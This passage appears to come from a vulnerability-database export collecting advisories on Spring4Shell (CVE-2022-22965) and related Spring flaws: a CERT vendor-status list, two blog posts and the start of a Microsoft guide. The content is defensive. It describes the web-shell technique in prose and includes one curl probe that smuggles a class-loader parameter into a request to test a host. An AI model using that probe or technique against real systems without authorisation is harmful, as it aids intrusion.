Please see the [Spring Framework RCE Early Announcement](<https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement>) for more details.\n\n### Acknowledgements\n\nThis issue was publicly disclosed by heige.\n\nThis document was written by Will Dormann\n\n### Vendor Information\n\n970766\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Additional information available\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n### Blueriq __ Affected\n\nNotified: 2022-04-02 Updated: 2022-04-02 **CVE-2022-22965**| Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://www.blueriq.com/en/insights/measures-cve22950-22963-22965>\n\n### BMC Software __ Affected\n\nNotified: 2022-04-06 Updated: 2022-04-06 **CVE-2022-22965**| Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://bmcsites.force.com/casemgmt/sc_KnowledgeArticle?sfdcid=000395541>\n\n### Cisco __ Affected\n\nNotified: 2022-04-06 Updated: 2022-04-08\n\n**Statement Date: April 07, 2022**\n\n**CVE-2022-22965**| Affected \n---|--- \n \n#### Vendor Statement\n\nCisco is aware of the vulnerability identified by CVE ID CVE-2022-22950 and with the title \"Spring Expression DoS Vulnerability\". We are following our well-established process to investigate all aspects of the issue. 
If something is found that our customers need to be aware of and respond to, we will communicate via our established disclosure process.\n\n#### References\n\n * <https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-java-spring-rce-Zx9GUc67>\n\n### Dell __ Affected\n\nUpdated: 2022-04-20 **CVE-2022-22965**| Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * [https://www.dell.com/support/home/en-us/drivers/driversdetails?driverid=0vdcg&oscode=naa&productcode=wyse-wms](<https://www.dell.com/support/home/en-us/drivers/driversdetails?driverid=0vdcg&oscode=naa&productcode=wyse-wms>)\n\n### JAMF software __ Affected\n\nNotified: 2022-04-06 Updated: 2022-04-04 **CVE-2022-22965**| Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://community.jamf.com/t5/jamf-pro/spring4shell-vulnerability/td-p/262584>\n\n### NetApp __ Affected\n\nNotified: 2022-04-06 Updated: 2022-04-05 **CVE-2022-22965**| Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://security.netapp.com/advisory/ntap-20220401-0001/>\n\n### PTC __ Affected\n\nNotified: 2022-04-06 Updated: 2022-04-04 **CVE-2022-22965**| Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * [https://www.ptc.com/en/support/article/cs366379?language=en&posno=1&q=CVE-2022-22965&source=search](<https://www.ptc.com/en/support/article/cs366379?language=en&posno=1&q=CVE-2022-22965&source=search>)\n\n### SAP SE __ Affected\n\nUpdated: 2022-04-13 **CVE-2022-22965**| Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * 
[https://dam.sap.com/mac/app/e/pdf/preview/embed/ucQrx6G?ltr=a&rc=10](<https://dam.sap.com/mac/app/e/pdf/preview/embed/ucQrx6G?ltr=a&rc=10>)\n\n### Siemens __ Affected\n\nUpdated: 2022-04-27 **CVE-2022-22965**| Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://cert-portal.siemens.com/productcert/pdf/ssa-254054.pdf>\n\n### SolarWinds __ Affected\n\nNotified: 2022-04-02 Updated: 2022-04-06\n\n**Statement Date: April 04, 2022**\n\n**CVE-2022-22965**| Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received any reports of these issues from SolarWinds customers but are actively investigating. The following SolarWinds product do utilize the Spring Framework, but have not yet been confirmed to be affected by this issue: \u2022 Security Event Manager (SEM) \u2022 Database Performance Analyzer (DPA) \u2022 Web Help Desk (WHD) While we have not seen or received reports of SolarWinds products affected by this issue, for the protection of their environments, SolarWinds strongly recommends all customers disconnect their public-facing (internet-facing) installations of these SolarWinds products (SEM, DPA, and WHD) from the internet.\n\n#### References\n\n * <https://www.solarwinds.com/trust-center/security-advisories/spring4shell>\n\n### Spring __ Affected\n\nNotified: 2022-03-31 Updated: 2022-03-31\n\n**Statement Date: March 31, 2022**\n\n**CVE-2022-22965**| Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://tanzu.vmware.com/security/cve-2022-22965>\n * <https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement>\n\n### VMware __ Affected\n\nNotified: 2022-04-06 Updated: 2022-04-03 **CVE-2022-22965**| Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * 
<https://www.vmware.com/security/advisories/VMSA-2022-0010.html>\n\n### Aruba Networks __ Not Affected\n\nNotified: 2022-04-06 Updated: 2022-04-08\n\n**Statement Date: April 07, 2022**\n\n**CVE-2022-22965**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nAruba Networks is aware of the issue and we have published a security advisory for our products at https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2022-006.txt\n\n### Check Point __ Not Affected\n\nUpdated: 2022-04-12 **CVE-2022-22965**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * [https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=&solutionid=sk178605&src=securityAlerts](<https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=&solutionid=sk178605&src=securityAlerts>)\n\n### Commvault __ Not Affected\n\nNotified: 2022-04-06 Updated: 2022-04-05 **CVE-2022-22965**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://documentation.commvault.com/v11/essential/146231_security_vulnerability_and_reporting.html#cv2022041-spring-framework>\n\n### Elastic __ Not Affected\n\nNotified: 2022-04-06 Updated: 2022-04-05 **CVE-2022-22965**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://discuss.elastic.co/t/spring4shell-spring-framework-remote-code-execution-vulnerability/301229>\n\n### F5 Networks __ Not Affected\n\nNotified: 2022-04-01 Updated: 2022-04-20\n\n**Statement Date: April 15, 2022**\n\n**CVE-2022-22965**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nF5 products and services and NGINX products are not affected by CVE-2022-22965.\n\n#### References\n\n * <https://support.f5.com/csp/article/K11510688>\n\n### Jenkins __ Not Affected\n\nNotified: 2022-04-06 Updated: 
2022-04-02 **CVE-2022-22965**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://www.jenkins.io/blog/2022/03/31/spring-rce-CVE-2022-22965/>\n\n### Micro Focus __ Not Affected\n\nNotified: 2022-04-06 Updated: 2022-04-05 **CVE-2022-22965**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://portal.microfocus.com/s/article/KM000005107?language=en_US>\n\n### Okta Inc. __ Not Affected\n\nNotified: 2022-04-06 Updated: 2022-04-04 **CVE-2022-22965**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://sec.okta.com/articles/2022/04/oktas-response-cve-2022-22965-spring4shell>\n\n### Palo Alto Networks __ Not Affected\n\nNotified: 2022-04-06 Updated: 2022-04-05 **CVE-2022-22965**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://security.paloaltonetworks.com/CVE-2022-22963>\n\n### Pulse Secure __ Not Affected\n\nNotified: 2022-04-06 Updated: 2022-04-05 **CVE-2022-22965**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://kb.pulsesecure.net/articles/Pulse_Secure_Article/KB45126/?kA13Z000000L3sW>\n\n### Red Hat __ Not Affected\n\nNotified: 2022-04-06 Updated: 2022-04-08\n\n**Statement Date: April 08, 2022**\n\n**CVE-2022-22965**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nNo Red Hat products are affected by CVE-2022-22963.\n\n### salesforce.com __ Not Affected\n\nNotified: 2022-04-06 Updated: 2022-04-05 **CVE-2022-22965**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://kb.tableau.com/articles/Issue/Spring4Shell-CVE-2022-22963-and-CVE-2022-22965>\n\n### 
SonarSource __ Not Affected\n\nNotified: 2022-04-06 Updated: 2022-04-06 **CVE-2022-22965**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://community.sonarsource.com/t/sonarqube-sonarcloud-and-spring4shell/60926>\n\n### Trend Micro __ Not Affected\n\nNotified: 2022-04-02 Updated: 2022-04-08\n\n**Statement Date: April 06, 2022**\n\n**CVE-2022-22965**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://success.trendmicro.com/dcx/s/solution/000290730>\n\n### Ubiquiti __ Not Affected\n\nNotified: 2022-04-06 Updated: 2022-04-08\n\n**Statement Date: April 08, 2022**\n\n**CVE-2022-22965**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nThe UniFi Network application only supports Java 8, which is not affected by this CVE. Still, the upcoming Network Version 7.2 update will upgrade to Spring Framework 5.3.18.\n\n#### References\n\n * <https://community.ui.com/releases/Statement-Regarding-Spring-CVE-2022-22965-2022-22950-and-2022-22963-001/19b2dc6f-4c36-436e-bd38-59ea0d6f1cb5>\n\n### Veritas Technologies __ Not Affected\n\nNotified: 2022-04-02 Updated: 2022-04-02 **CVE-2022-22965**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://www.veritas.com/content/support/en_US/security/VTS22-006>\n\n### Atlassian __ Unknown\n\nNotified: 2022-04-01 Updated: 2022-04-02 **CVE-2022-22965**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://community.developer.atlassian.com/t/attention-cve-2022-22965-spring-framework-rce-investigation/57172>\n\n### CyberArk __ Unknown\n\nUpdated: 2022-04-12 **CVE-2022-22965**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * 
<https://cyberark-customers.force.com/s/article/Spring-Framework-CVE-2022-22965>\n\n### Fortinet __ Unknown\n\nNotified: 2022-04-02 Updated: 2022-04-02 **CVE-2022-22965**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://fortiguard.fortinet.com/psirt/FG-IR-22-072>\n\n### GeoServer __ Unknown\n\nNotified: 2022-04-02 Updated: 2022-04-02 **CVE-2022-22965**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://geoserver.org/announcements/vulnerability/2022/04/01/spring.html>\n\n### Kofax __ Unknown\n\nNotified: 2022-04-06 Updated: 2022-04-05 **CVE-2022-22965**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://community.kofax.com/s/question/0D53m00006FG8NVCA1/communications-manager-release-announcements?language=en_US>\n * <https://community.kofax.com/s/question/0D53m00006w0My3CAE/controlsuite-release-announcements?language=en_US>\n * <https://community.kofax.com/s/question/0D53m00006FG8RtCAL/readsoft-release-announcements?language=en_US>\n * <https://community.kofax.com/s/question/0D53m00006FG8ThCAL/robotic-process-automation-release-announcements?language=en_US>\n * <https://community.kofax.com/s/question/0D53m00006FG8QdCAL/markview-release-announcements>\n * <https://knowledge.kofax.com/General_Support/General_Troubleshooting/Kofax_products_and_Spring4Shell_vulnerability_information>\n\n### McAfee __ Unknown\n\nNotified: 2022-04-06 Updated: 2022-04-11 **CVE-2022-22965**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * [https://kc.mcafee.com/corporate/index?page=content&id=KB95447](<https://kc.mcafee.com/corporate/index?page=content&id=KB95447>)\n\n### ServiceNow __ Unknown\n\nNotified: 2022-04-02 Updated: 2022-04-02 **CVE-2022-22965**| Unknown \n---|--- 
\n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * [https://community.servicenow.com/community?id=community_question&sys_id=5530394edb2e8950e2adc2230596194f](<https://community.servicenow.com/community?id=community_question&sys_id=5530394edb2e8950e2adc2230596194f>)\n\n### TIBCO __ Unknown\n\nNotified: 2022-04-06 Updated: 2022-05-19\n\n**Statement Date: May 17, 2022**\n\n**CVE-2022-22965**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://www.tibco.com/support/notices/spring-framework-vulnerability-update>\n\n### Alphatron Medical Unknown\n\nNotified: 2022-04-02 Updated: 2022-04-02 **CVE-2022-22965**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Extreme Networks Unknown\n\nNotified: 2022-04-06 Updated: 2022-04-05 **CVE-2022-22965**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### PagerDuty Unknown\n\nNotified: 2022-04-02 Updated: 2022-04-02 **CVE-2022-22965**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\nView all 39 vendors __View less vendors __\n\n \n\n\n### References\n\n * <https://tanzu.vmware.com/security/cve-2022-22965>\n * <https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement>\n * <https://www.cyberkendra.com/2022/03/springshell-rce-0-day-vulnerability.html>\n * <https://github.com/NCSC-NL/spring4shell/blob/main/software/README.md>\n\n### Other Information\n\n**CVE IDs:** | [CVE-2022-22965 ](<http://web.nvd.nist.gov/vuln/detail/CVE-2022-22965>) \n---|--- \n**Date Public:** | 2022-03-30 \n**Date First Published:** | 2022-03-31 \n**Date Last Updated: ** | 2022-05-19 16:09 UTC \n**Document Revision: ** | 22 \n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", 
"attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-31T00:00:00", "type": "cert", "title": "Spring Framework insecurely handles PropertyDescriptor objects with data binding", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22950", "CVE-2022-22963", "CVE-2022-22965"], "modified": "2022-05-19T16:09:00", "id": "VU:970766", "href": "https://www.kb.cert.org/vuls/id/970766", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "avleonov": [{"lastseen": "2022-04-06T15:11:45", "description": "Hello everyone! This episode will be about last week's high-profile vulnerabilities in Spring. Let's figure out what happened.\n\nAlternative video link (for Russia): <https://vk.com/video-149273431_456239078>\n\nOf course, it's amazing how fragmented the software development world has become. Now there are so many technologies, programming languages, libraries and frameworks! It becomes very difficult to keep them all in sight. Especially if it's not the stack you use every day. Entropy keeps growing every year. Programmers are relying more and more on off-the-shelf libraries and frameworks, even where it may not be fully justified. 
And vulnerabilities in these off-the-shelf components lead to huge problems. So it was in the case of a very critical Log4Shell vulnerability, so it may be in the case of Spring vulnerabilities.\n\n[Spring](<https://spring.io/>) is a set of products that are used for Java development. They are developed and maintained by VMware. The main one is Spring Framework. But there are a lot of them, [at least 21 on the website](<https://spring.io/projects/spring-framework>). And because Spring belongs to VMware, you can find a description of the vulnerabilities on the [VMware Tanzu website](<https://tanzu.vmware.com/security>). VMware Tanzu is a suite of products that helps users run and manage multiple Kubernetes (K8S) clusters across public and private \u201cclouds\u201d. Spring is apparently also part of this suite and therefore Spring vulnerabilities are published there. Let's look at the 3 most serious vulnerabilities published in the last month.\n\n## **[CVE-2022-22965](<https://tanzu.vmware.com/security/CVE-2022-22965>): \"Spring4Shell\", Spring Framework remote code execution (RCE) via Data Binding on JDK 9+**\n\nSpring Core Framework is widely used in Java applications. It allows software developers to develop Java applications with enterprise-level components effortlessly. \n\nSpring4Shell vulnerability allows remote attackers to plant a web shell when running Spring Framework apps on top of JRE 9. It is caused by unsafe deserialization of given arguments that a simple HTTP POST request can trigger and allow full remote access. In fact it is a patch bypass of the old CVE-2010-1622 vulnerability that was introduced 12 years ago.\n\nThe exploitation of this vulnerability relies on an endpoint with DataBinder enabled, which decodes data from the request body automatically. \n\nThe specific exploit requires the application to run on Tomcat as a WAR deployment. 
If the application is deployed as a Spring Boot executable jar, which is the default, it is not vulnerable to the exploit. However, the nature of the vulnerability is more general, and there may be other ways to exploit it.\n\nThese are the prerequisites for the exploit:\n\n * JDK 9 or higher\n * Apache Tomcat as the Servlet container\n * Packaged as WAR\n * spring-webmvc or spring-webflux dependency\n * Spring Framework 5.3.0 to 5.3.17, 5.2.0 to 5.2.19. Older, unsupported versions are also affected\n\nThere are [signs of exploitation in the wild](<https://blog.netlab.360.com/what-our-honeypot-sees-just-one-day-after-the-spring4shell-advisory-en/>) for this vulnerability. There are more than 30 repositories with [PoC and examples of vulnerable applications on github](<https://github.com/search?q=CVE-2022-22965>). \n\nIn short, look for Spring Framework applications on your Tomcats and then update them to version 5.3.18 and 5.2.20. \n\nQualys [recommendations for Linux](<https://blog.qualys.com/vulnerabilities-threat-research/2022/03/31/spring-framework-zero-day-remote-code-execution-spring4shell-vulnerability>):\n\n * Find java 9+ with `locate`\n * Find \"`spring-webmvc-*.jar`\", \"`spring-webflux*.jar`\" or \"`spring-boot*.jar`\" in `ls -l /proc/*/fd`\n\nAs an option, you can try to update the Tomcats first. It is easier. 
While CVE-2022-22965 resides in the Spring Framework, the Apache Tomcat team [released new versions of Tomcat](<https://spring.io/blog/2022/04/01/spring-framework-rce-mitigation-alternative>) to \u201dclose the attack vector on Tomcat\u2019s side.\u201d \n\nThe remaining two vulnerabilities are in rarer components that are not part of the Spring Core Framework.\n\n## [CVE-2022-22963](<https://tanzu.vmware.com/security/cve-2022-22963>): Remote code execution in Spring Cloud Function by malicious Spring Expression\n\nSpring Cloud Function is a serverless framework for implementing business logic via functions.\n\nIn Spring Cloud Function versions 3.1.6, 3.2.2 and older unsupported versions, when using routing functionality it is possible for a user to provide a specially crafted SpEL as a routing-expression that may result in remote code execution and access to local resources. Users of affected versions should upgrade to 3.1.7, 3.2.3. No other steps are necessary. \n\nThere are also [PoCs for this vulnerability](<https://github.com/me2nuk/CVE-2022-22963>). \n\nAnd finally, I would like to finish with a vulnerability that came out a month ago. And went quite unnoticed.\n\n## [CVE-2022-22947](<https://tanzu.vmware.com/security/cve-2022-22947>): Spring Cloud Gateway Code Injection Vulnerability\n\nSpring Cloud Gateway aims to provide a simple, yet effective way to route to APIs and provide cross cutting concerns to them such as: security, monitoring/metrics, and resiliency.\n\nApplications using Spring Cloud Gateway are vulnerable to a code injection attack when the Gateway Actuator endpoint is enabled, exposed and unsecured. A remote attacker could make a maliciously crafted request that could allow arbitrary remote execution on the remote host.\n\nUsers of affected versions should apply the following remediation. 3.1.x users should upgrade to 3.1.1+. 3.0.x users should upgrade to 3.0.7+. 
If the Gateway actuator endpoint is not needed it should be disabled via management.endpoint.gateway.enabled: false.\n\nThere are also PoCs for this vulnerability not only in Github, but [also in public packs](<https://vulners.com/exploitdb/EDB-ID:50799>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-04-03T00:15:45", "type": "avleonov", "title": "Spring4Shell, Spring Cloud Function RCE and Spring Cloud Gateway Code Injection", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-1622", "CVE-2022-22947", "CVE-2022-22963", "CVE-2022-22965"], "modified": "2022-04-03T00:15:45", "id": "AVLEONOV:D75470B5417CEFEE479C9D8FAE754F1C", "href": "https://avleonov.com/2022/04/03/spring4shell-spring-cloud-function-rce-and-spring-cloud-gateway-code-injection/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "securelist": [{"lastseen": "2022-04-04T17:28:33", "description": "\n\nLast week researchers found the critical vulnerability CVE-2022-22965 in Spring \u2013 the open source Java framework. 
Using the vulnerability, an attacker can execute arbitrary code on a remote web server, which makes CVE-2022-22965 a critical threat, given the Spring framework's popularity. By analogy with the [infamous Log4Shell threat](<https://securelist.com/cve-2021-44228-vulnerability-in-apache-log4j-library/105210/>), the vulnerability was named Spring4Shell.\n\n## CVE-2022-22965 and CVE-2022-22963: technical details\n\nCVE-2022-22965 (Spring4Shell, SpringShell) is a vulnerability in the Spring Framework that uses data binding functionality to bind data stored within an HTTP request to certain objects used by an application. The bug exists in the _getCachedIntrospectionResults_ method, which can be used to gain unauthorized access to such objects by passing their class names via an HTTP request. It creates the risks of data leakage and remote code execution when special object classes are used. This vulnerability is similar to the long-closed CVE-2010-1622, where class name checks were added as a fix so that the name did not match _classLoader_ or _protectionDomain_. However, in a newer version of JDK an alternative method exists for such exploitation, for example, through Java 9 Platform Module System functionality. \nSo an attacker can overwrite the Tomcat logging configuration and then upload a JSP web shell to execute arbitrary commands on a server running a vulnerable version of the framework.\n\nA vulnerable configuration consists of:\n\n * JDK version 9+\n * Apache Tomcat for serving the application\n * Spring Framework versions 5.3.0 to 5.3.17 and 5.2.0 to 5.2.19 and below\n * application built as a WAR file\n\nCVE-2022-22963 is a vulnerability in the routing functionality of Spring Cloud Function that allows code injection through Spring Expression Language (SpEL) by adding a special _spring.cloud.function.routing-expression_ header to an HTTP request. 
SpEL is a special expression language created for Spring Framework that supports queries and object graph management at runtime. This vulnerability can also be used for remote code execution.\n\nA vulnerable configuration consists of:\n\n * Spring Cloud Function 3.1.6, 3.2.2 and older versions\n\n## Mitigations for Spring vulnerabilities exploitation\n\nCVE-2022-22965 is fixed in Spring Boot 2.6.6; see [the Spring blog for details](<https://spring.io/blog/2022/03/31/spring-boot-2-6-6-available-now>). \n\nTo fix CVE-2022-22963, you also need to install the new Spring Cloud Function versions; see the [VMware website for details](<https://tanzu.vmware.com/security/cve-2022-22963>). \n\nTo detect exploitation attempts, ensure that Advanced Exploit Prevention and Network Attack Blocker features are enabled. Some techniques used during exploitation can be seen in other exploits that we detect, which is why the verdict names can differ.\n\n## Indicators of Compromise\n\n**Verdicts** \nPDM:Exploit.Win32.Generic \nUMIDS:Intrusion.Generic.Agent.gen \nIntrusion.Generic.CVE-*.*\n\n**MD5 hashes of the exploits** \n7e46801dd171bb5bf1771df1239d760c - shell.jsp (CVE-2022-22965) \n3de4e174c2c8612aebb3adef10027679 - exploit.py (CVE-2022-22965)\n\n**Detection of the exploitation process with Kaspersky EDR Expert** \n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/04/04152646/kata_spring4shell.png>)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-04-04T15:30:36", "type": "securelist", "title": "Spring4Shell (CVE-2022-22965): details and mitigations", "bulletinFamily": "blog", 
"cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-1622", "CVE-2021-44228", "CVE-2022-22963", "CVE-2022-22965"], "modified": "2022-04-04T15:30:36", "id": "SECURELIST:E21F9D6D3E5AFD65C99FC385D4B5F1DC", "href": "https://securelist.com/spring4shell-cve-2022-22965/106239/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "mmpc": [{"lastseen": "2022-04-11T23:40:15", "description": "**_April 11, 2022 update_** \u2013 __Azure Web Application Firewall (WAF) customers with Regional WAF with Azure Application Gateway now has enhanced protection for critical Spring vulnerabilities - [CVE-2022-22963](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22963>), [CVE-2022-22965](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22965>), and [CVE-2022-22947](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22947>)._ _See [](<https://www.microsoft.com/security/blog/wp-admin/post.php?post=110715&action=edit#detectandprotect>)Detect and protect with Azure Web Application Firewall (Azure WAF) section for details__.\n\nOn March 31, 2022, vulnerabilities in the Spring Framework for Java were [publicly disclosed](<https://www.springcloud.io/post/2022-03/spring-framework-rce-early-announcement/#gsc.tab=0>). Microsoft is currently assessing the impact associated with these vulnerabilities. 
This blog is for customers looking for protection against exploitation and ways to detect vulnerable installations on their network of the critical remote code execution (RCE) vulnerability [CVE-2022-22965](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22965>) (also known as SpringShell or Spring4Shell).\n\nThe Spring Framework is the most widely used lightweight open-source framework for Java. In Java Development Kit (JDK) version 9.0 or later, a remote attacker can obtain an _AccessLogValve _object through the framework\u2019s parameter binding feature and use malicious field values to trigger the pipeline mechanism and write to a file in an arbitrary path, if certain conditions are met. \n\nThe vulnerability in Spring Core\u2014referred to in the security community as SpringShell or Spring4Shell\u2014can be exploited when an attacker sends a specially crafted query to a web server running the Spring Core framework. Other vulnerabilities disclosed in the same component are less critical and not tracked as part of this blog.\n\nImpacted systems have the following traits:\n\n * Running JDK 9.0 or later\n * Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and earlier versions\n * Apache Tomcat as the Servlet container:\n * Packaged as a traditional Java web archive (WAR) and deployed in a standalone Tomcat instance; typical Spring Boot deployments using an embedded Servlet container or reactive web server are not impacted\n * Tomcat has _spring-webmvc_ or _spring-webflux_ dependencies\n\nAny system using JDK 9.0 or later and using the Spring Framework or derivative frameworks should be considered vulnerable. The following nonmalicious command can be used to determine vulnerable systems:\n \n \n $ curl host:port/path?class.module.classLoader.URLs%5B0%5D=0\n\nA host that returns an HTTP 400 response should be considered vulnerable to the attack detailed in the proof of concept (POC) below. 
Note that while this test is a good indicator of a system\u2019s susceptibility to an attack, any system within the scope of impacted systems listed above should still be considered vulnerable.\n\nThe [](<https://www.microsoft.com/microsoft-365/security/microsoft-365-defender>)[threat and vulnerability management](<https://docs.microsoft.com/azure/defender-for-cloud/deploy-vulnerability-assessment-tvm>) console within [Microsoft 365 Defender](<https://www.microsoft.com/microsoft-365/security/microsoft-365-defender>) provides detection and reporting for this vulnerability.\n\nThis blog covers the following topics:\n\n 1. Observed activity\n 2. Attack breakdown\n 3. The vulnerability and exploit in depth\n * Background\n * Request mapping and request parameter binding\n * The process of property binding\n * The vulnerability and its exploitation\n * Prelude: CVE-2010-1622\n * The current exploit: CVE-2022-22965\n * From ClassLoader to AccessLogValve\n 4. Discovery and mitigations\n * How to find vulnerable devices\n * Enhanced protection with Azure Firewall Premium\n * Detect and protect with Azure Web Application Firewall (Azure WAF)\n * Global WAF with Azure Front Door\n * Regional WAF with Azure Application Gateway\n * Patch information and workarounds\n 5. Detections\n * Microsoft 365 Defender\n * Endpoint detection and response (EDR)\n * Antivirus\n * Hunting\n * Microsoft 365 Defender advanced hunting queries \n * Microsoft Sentinel\n\n## 